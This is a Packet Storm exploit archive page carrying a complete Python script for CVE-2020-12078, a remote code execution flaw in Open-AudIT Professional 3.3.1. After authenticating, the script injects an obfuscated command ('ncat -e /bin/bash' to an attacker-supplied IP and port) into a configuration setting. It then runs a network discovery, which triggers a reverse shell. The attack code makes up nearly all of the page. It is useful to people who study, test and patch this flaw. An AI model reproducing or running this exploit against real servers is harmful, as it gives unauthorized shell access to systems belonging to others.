what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Open-AudIT Professional 3.3.1 Remote Code Execution

Open-AudIT Professional 3.3.1 Remote Code Execution
Posted Apr 29, 2020
Authored by Askar

Open-AudIT Professional version 3.3.1 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2020-12078
SHA-256 | 5893982b84476fb326ba71dec7355182063aa15846f74c2968e884acb1e5e0f0

Open-AudIT Professional 3.3.1 Remote Code Execution

Change Mirror Download
# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution
# Date: 2020-04-22
# Exploit Author: Askar
# CVE: CVE-2020-12078
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24

#!/usr/bin/python3

import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote

warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')


if len(sys.argv) !=3D 6:
print("[~] Usage : ./openaudit-exploit.py url username password ip port=
")
exit()

url =3D sys.argv[1]
username =3D sys.argv[2]
password =3D sys.argv[3]
ip =3D sys.argv[4]
port =3D sys.argv[5]

request =3D requests.session()

def inject_payload():
configuration_path =3D url+"/en/omk/open-audit/configuration/90"
data =3D 'data=3D{"data":{"id":"90","type":"configuration","attributes"=
:{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, =
port)
request.patch(configuration_path, data)
print("[+] Payload injected in settings")


def start_discovery():
discovery_path =3D url+"/en/omk/open-audit/discoveries/create"
post_discovery_path =3D url+"/en/omk/open-audit/discoveries"
scan_name =3D "".join([random.choice(string.ascii_uppercase) for i in r=
ange(10)])
req =3D request.get(discovery_path)

response =3D req.text
soup =3D BeautifulSoup(response, "html5lib")
token =3D soup.findAll('input')[5].get("value")
buttons =3D soup.findAll("button")
headers =3D {"Referer" : discovery_path}
request_data =3D {
"data[attributes][name]":scan_name,
"data[attributes][other][subnet]":"10.10.10.1/24",
"data[attributes][other][ad_server]":"",
"data[attributes][other][ad_domain]":"",
"submit":"",
"data[type]":"discoveries",
"data[access_token]":token,
"data[attributes][complete]":"y",
"data[attributes][org_id]":"1",
"data[attributes][type]":"subnet",
"data[attributes][devices_assigned_to_org]":"",
"data[attributes][devices_assigned_to_location]":"",
"data[attributes][other][nmap][discovery_scan_option_id]":"1",
"data[attributes][other][nmap][ping]":"y",
"data[attributes][other][nmap][service_version]":"n",
"data[attributes][other][nmap][open|filtered]":"n",
"data[attributes][other][nmap][filtered]":"n",
"data[attributes][other][nmap][timing]":"4",
"data[attributes][other][nmap][nmap_tcp_ports]":"0",
"data[attributes][other][nmap][nmap_udp_ports]":"0",
"data[attributes][other][nmap][tcp_ports]":"22,135,62078",
"data[attributes][other][nmap][udp_ports]":"161",
"data[attributes][other][nmap][timeout]":"",
"data[attributes][other][nmap][exclude_tcp_ports]":"",
"data[attributes][other][nmap][exclude_udp_ports]":"",
"data[attributes][other][nmap][exclude_ip]":"",
"data[attributes][other][nmap][ssh_ports]":"22",
"data[attributes][other][match][match_dbus]":"",
"data[attributes][other][match][match_fqdn]":"",
"data[attributes][other][match][match_dns_fqdn]":"",
"data[attributes][other][match][match_dns_hostname]":"",
"data[attributes][other][match][match_hostname]":"",
"data[attributes][other][match][match_hostname_dbus]":"",
"data[attributes][other][match][match_hostname_serial]":"",
"data[attributes][other][match][match_hostname_uuid]":"",
"data[attributes][other][match][match_ip]":"",
"data[attributes][other][match][match_ip_no_data]":"",
"data[attributes][other][match][match_mac]":"",
"data[attributes][other][match][match_mac_vmware]":"",
"data[attributes][other][match][match_serial]":"",
"data[attributes][other][match][match_serial_type]":"",
"data[attributes][other][match][match_sysname]":"",
"data[attributes][other][match][match_sysname_serial]":"",
"data[attributes][other][match][match_uuid]":""

}
print("[+] Creating discovery ..")
req =3D request.post(post_discovery_path, data=3Drequest_data, headers=
=3Dheaders, allow_redirects=3DFalse)
disocvery_url =3D url + req.headers['Location'] + "/execute"
print("[+] Triggering payload ..")
print("[+] Check your nc ;)")
request.get(disocvery_url)


def login():
login_info =3D {
"redirect_url": "/en/omk/open-audit",
"username": username,
"password": password
}
login_request =3D request.post(url+"/en/omk/open-audit/login", login_in=
fo)
login_text =3D login_request.text
if "There was an error authenticating" in login_text:
return False
else:
return True

if login():
print("[+] LoggedIn Successfully")
inject_payload()
start_discovery()
else:
print("[-] Cannot login!")
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close